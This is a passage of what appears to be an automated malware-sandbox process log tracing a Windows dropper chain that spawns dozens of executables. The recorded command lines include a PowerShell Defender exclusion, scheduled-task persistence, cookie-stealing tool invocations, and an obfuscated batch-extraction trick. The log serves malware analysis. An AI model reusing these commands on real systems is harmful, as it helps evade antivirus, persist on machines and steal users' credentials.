C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4196
-
-
-
-
C:\Users\Admin\Documents\gXEBS9ErjQRLqweha_8AC5QT.exe"C:\Users\Admin\Documents\gXEBS9ErjQRLqweha_8AC5QT.exe"3⤵
- Executes dropped EXE
PID:5560 -
C:\Users\Admin\Documents\gXEBS9ErjQRLqweha_8AC5QT.exe"C:\Users\Admin\Documents\gXEBS9ErjQRLqweha_8AC5QT.exe"4⤵PID:6208
-
-
-
C:\Users\Admin\Documents\qMn_tJPqi2r4PCGE4bJHiVBA.exe"C:\Users\Admin\Documents\qMn_tJPqi2r4PCGE4bJHiVBA.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3384
-
-
C:\Users\Admin\Documents\lu45MPPlSXDcE87FXpGzebNT.exe"C:\Users\Admin\Documents\lu45MPPlSXDcE87FXpGzebNT.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5532
-
-
C:\Users\Admin\Documents\uGITRZ1Q5t0sp0tv9uZRib6I.exe"C:\Users\Admin\Documents\uGITRZ1Q5t0sp0tv9uZRib6I.exe"3⤵
- Executes dropped EXE
- Windows security modification
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:5040 -
C:\Users\Admin\AppData\Local\Temp\aae53f7f-ac42-4725-a5fe-0ea089f670a6\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\aae53f7f-ac42-4725-a5fe-0ea089f670a6\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\aae53f7f-ac42-4725-a5fe-0ea089f670a6\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4136 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\aae53f7f-ac42-4725-a5fe-0ea089f670a6\test.bat"5⤵PID:5432
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Documents\uGITRZ1Q5t0sp0tv9uZRib6I.exe" -Force4⤵PID:6540
-
-
C:\Users\Admin\Documents\uGITRZ1Q5t0sp0tv9uZRib6I.exe"C:\Users\Admin\Documents\uGITRZ1Q5t0sp0tv9uZRib6I.exe"4⤵PID:6768
-
-
-
C:\Users\Admin\Documents\pTMuLJ8Llt3ZAyIu_jKMDOT6.exe"C:\Users\Admin\Documents\pTMuLJ8Llt3ZAyIu_jKMDOT6.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5472 -
C:\Users\Admin\Documents\pTMuLJ8Llt3ZAyIu_jKMDOT6.exeC:\Users\Admin\Documents\pTMuLJ8Llt3ZAyIu_jKMDOT6.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5312
-
-
-
C:\Users\Admin\Documents\chqsf1lkE_zkaAtdaYT5l3cV.exe"C:\Users\Admin\Documents\chqsf1lkE_zkaAtdaYT5l3cV.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:5436 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"4⤵PID:5720
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5436 -s 2324⤵
- Program crash
PID:6488
-
-
-
C:\Users\Admin\Documents\tc7tx2PYATrMO3q1RR7JDgxh.exe"C:\Users\Admin\Documents\tc7tx2PYATrMO3q1RR7JDgxh.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5356
-
-
C:\Users\Admin\Documents\4IiTX4vYv1b3qLdHmypJF56x.exe"C:\Users\Admin\Documents\4IiTX4vYv1b3qLdHmypJF56x.exe"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:548
-
-
C:\Users\Admin\Documents\AlCWTV1YvTp6RqX1w0rqo08a.exe"C:\Users\Admin\Documents\AlCWTV1YvTp6RqX1w0rqo08a.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1012 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1012 -s 2964⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:4584
-
-
-
C:\Users\Admin\Documents\HmiIeGHuclxHvR2b2VWhEtfh.exe"C:\Users\Admin\Documents\HmiIeGHuclxHvR2b2VWhEtfh.exe"3⤵
- Executes dropped EXE
PID:5648 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5648 -s 2404⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:5428
-
-
-
C:\Users\Admin\Documents\8fsyD3Gw2a2p5RQr7p20wmew.exe"C:\Users\Admin\Documents\8fsyD3Gw2a2p5RQr7p20wmew.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2812
-
-
C:\Users\Admin\Documents\xupkdoyrIX37kZkiYbuCg7XQ.exe"C:\Users\Admin\Documents\xupkdoyrIX37kZkiYbuCg7XQ.exe"3⤵
- Executes dropped EXE
PID:656 -
C:\Users\Admin\Documents\xupkdoyrIX37kZkiYbuCg7XQ.exeC:\Users\Admin\Documents\xupkdoyrIX37kZkiYbuCg7XQ.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1272
-
-
-
C:\Users\Admin\Documents\USk6VuEkJK4XsVXYU2D1C3Ec.exe"C:\Users\Admin\Documents\USk6VuEkJK4XsVXYU2D1C3Ec.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1504 -
C:\Users\Admin\Documents\USk6VuEkJK4XsVXYU2D1C3Ec.exe"C:\Users\Admin\Documents\USk6VuEkJK4XsVXYU2D1C3Ec.exe" -q4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5996 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5996 -s 9765⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:500
-
-
-
-
C:\Users\Admin\Documents\VUHljWwBSoWgPG29Im1iwYru.exe"C:\Users\Admin\Documents\VUHljWwBSoWgPG29Im1iwYru.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3324 -
C:\Users\Admin\AppData\Local\Temp\is-KOE84.tmp\VUHljWwBSoWgPG29Im1iwYru.tmp"C:\Users\Admin\AppData\Local\Temp\is-KOE84.tmp\VUHljWwBSoWgPG29Im1iwYru.tmp" /SL5="$3024C,138429,56832,C:\Users\Admin\Documents\VUHljWwBSoWgPG29Im1iwYru.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:560 -
C:\Users\Admin\AppData\Local\Temp\is-OC4HG.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-OC4HG.tmp\Setup.exe" /Verysilent5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:5900 -
C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"6⤵
- Executes dropped EXE
PID:1908
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe"C:\Program Files (x86)\GameBox INC\GameBox\Versiumresearch.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2200 -
C:\Users\Admin\AppData\Roaming\1874953.exe"C:\Users\Admin\AppData\Roaming\1874953.exe"7⤵PID:5412
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5412 -s 20808⤵
- Program crash
PID:6552
-
-
-
C:\Users\Admin\AppData\Roaming\1125106.exe"C:\Users\Admin\AppData\Roaming\1125106.exe"7⤵PID:6832
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"8⤵PID:5748
-
-
-
C:\Users\Admin\AppData\Roaming\5085482.exe"C:\Users\Admin\AppData\Roaming\5085482.exe"7⤵PID:6240
-
-
C:\Users\Admin\AppData\Roaming\3663783.exe"C:\Users\Admin\AppData\Roaming\3663783.exe"7⤵PID:6716
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 23048⤵
- Program crash
PID:2068
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5936 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628921533 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"7⤵PID:6844
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:680 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 680 -s 19847⤵
- Program crash
PID:7036
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6048 -
C:\Users\Admin\AppData\Local\Temp\is-F83R3.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-F83R3.tmp\MediaBurner2.tmp" /SL5="$20366,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"7⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:1280 -
C:\Users\Admin\AppData\Local\Temp\is-GDKJJ.tmp\3377047_logo_media.exe"C:\Users\Admin\AppData\Local\Temp\is-GDKJJ.tmp\3377047_logo_media.exe" /S /UID=burnerch28⤵PID:6736
-
C:\Program Files\Common Files\WFHDHAGAJG\ultramediaburner.exe"C:\Program Files\Common Files\WFHDHAGAJG\ultramediaburner.exe" /VERYSILENT9⤵PID:6804
-
C:\Users\Admin\AppData\Local\Temp\is-H6K85.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-H6K85.tmp\ultramediaburner.tmp" /SL5="$4027C,281924,62464,C:\Program Files\Common Files\WFHDHAGAJG\ultramediaburner.exe" /VERYSILENT10⤵PID:6168
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu11⤵PID:3220
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\67-1a0ef-f98-276b1-1038f05c57965\Wokeqaecopae.exe"C:\Users\Admin\AppData\Local\Temp\67-1a0ef-f98-276b1-1038f05c57965\Wokeqaecopae.exe"9⤵PID:3048
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e610⤵PID:2960
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffdee0446f8,0x7ffdee044708,0x7ffdee04471811⤵PID:6408
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad10⤵
- Suspicious behavior: EnumeratesProcesses
PID:6488 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffdee0446f8,0x7ffdee044708,0x7ffdee04471811⤵PID:7884
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\13-2df7a-aa8-e70bd-1d1c7efac71ca\Sawiruzhetu.exe"C:\Users\Admin\AppData\Local\Temp\13-2df7a-aa8-e70bd-1d1c7efac71ca\Sawiruzhetu.exe"9⤵PID:668
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0k4dzw4a.nqw\LivelyScreenRecorder.exe & exit10⤵PID:3288
-
C:\Users\Admin\AppData\Local\Temp\0k4dzw4a.nqw\LivelyScreenRecorder.exeC:\Users\Admin\AppData\Local\Temp\0k4dzw4a.nqw\LivelyScreenRecorder.exe11⤵PID:1252
-
C:\Users\Admin\AppData\Local\Temp\tmpD032_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpD032_tmp.exe"12⤵PID:6676
-
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\System32\dllhost.exe"13⤵PID:7132
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Presto.avi13⤵PID:3428
-
C:\Windows\SysWOW64\cmd.execmd14⤵PID:2352
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^NOMPYcpppIdmxMIjpZJiqIaRacbYsDyCvWwIcZWZvJmoLxdJeLbxMJXtvVbDYlSFDOebLqQprKLsppyXtNVFyKPNZWjmCzqkRTEXaSYeUgseYGVjPmnlfjATYfnONsHKJmAdFoFjPTLRzNPzwZ$" Oggi.avi15⤵PID:5668
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comHai.exe.com l15⤵PID:4176
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l16⤵PID:4268
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l17⤵PID:7156
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l18⤵PID:6388
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l19⤵PID:5708
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l20⤵PID:6268
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l21⤵PID:5684
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l22⤵PID:5520
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l23⤵PID:7700
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l24⤵PID:8144
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l25⤵PID:4368
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l26⤵PID:132
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l27⤵PID:3712
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l28⤵PID:3156
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l29⤵PID:7460
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l30⤵PID:7232
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l31⤵PID:1988
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l32⤵PID:1484
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l33⤵PID:2668
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l34⤵PID:7360
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l35⤵PID:7612
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l36⤵PID:8144
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l37⤵PID:6316
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l38⤵PID:7804
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l39⤵PID:7096
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l40⤵PID:4784
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l41⤵PID:4140
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l42⤵PID:7460
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l43⤵PID:5280
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l44⤵PID:4636
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l45⤵PID:4836
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l46⤵PID:7960
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l47⤵PID:7008
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l48⤵PID:4084
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l49⤵PID:7912
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l50⤵PID:7488
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l51⤵PID:7368
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l52⤵PID:2940
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l53⤵PID:5540
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l54⤵PID:6008
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l55⤵PID:4716
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l56⤵PID:7280
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l57⤵PID:8124
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l58⤵PID:6712
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l59⤵PID:6600
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l60⤵PID:4628
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l61⤵PID:4836
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 3015⤵
- Suspicious use of SetThreadContext
- Runs ping.exe
PID:5300
-
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uuz43tgv.2pz\GcleanerEU.exe /eufive & exit10⤵PID:6384
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dy0tpbj0.pv4\JoSetp.exe & exit10⤵PID:6716
-
C:\Users\Admin\AppData\Local\Temp\dy0tpbj0.pv4\JoSetp.exeC:\Users\Admin\AppData\Local\Temp\dy0tpbj0.pv4\JoSetp.exe11⤵PID:6880
-
C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"12⤵PID:5544
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit13⤵PID:6892
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'14⤵
- Creates scheduled task(s)
PID:2204
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"13⤵PID:4256
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit14⤵PID:7556
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'15⤵
- Creates scheduled task(s)
PID:5352
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"14⤵PID:8028
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\JoSetp.exe"C:\Users\Admin\AppData\Local\Temp\JoSetp.exe"12⤵PID:3108
-
C:\Users\Admin\AppData\Roaming\7751116.exe"C:\Users\Admin\AppData\Roaming\7751116.exe"13⤵PID:2544
-
-
C:\Users\Admin\AppData\Roaming\6608348.exe"C:\Users\Admin\AppData\Roaming\6608348.exe"13⤵PID:5588
-
-
C:\Users\Admin\AppData\Roaming\4043255.exe"C:\Users\Admin\AppData\Roaming\4043255.exe"13⤵PID:7000
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7000 -s 231214⤵
- Program crash
PID:6924
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w3ptuzki.m4a\installer.exe /qn CAMPAIGN="654" & exit10⤵PID:6584
-
C:\Users\Admin\AppData\Local\Temp\w3ptuzki.m4a\installer.exeC:\Users\Admin\AppData\Local\Temp\w3ptuzki.m4a\installer.exe /qn CAMPAIGN="654"11⤵
- Suspicious use of AdjustPrivilegeToken
PID:6076 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\w3ptuzki.m4a\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\w3ptuzki.m4a\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628921533 /qn CAMPAIGN=""654"" " CAMPAIGN="654"12⤵PID:6056
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2aot2mwn.v2s\ufgaa.exe & exit10⤵PID:4304
-
C:\Users\Admin\AppData\Local\Temp\2aot2mwn.v2s\ufgaa.exeC:\Users\Admin\AppData\Local\Temp\2aot2mwn.v2s\ufgaa.exe11⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5720 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:6656
-
-
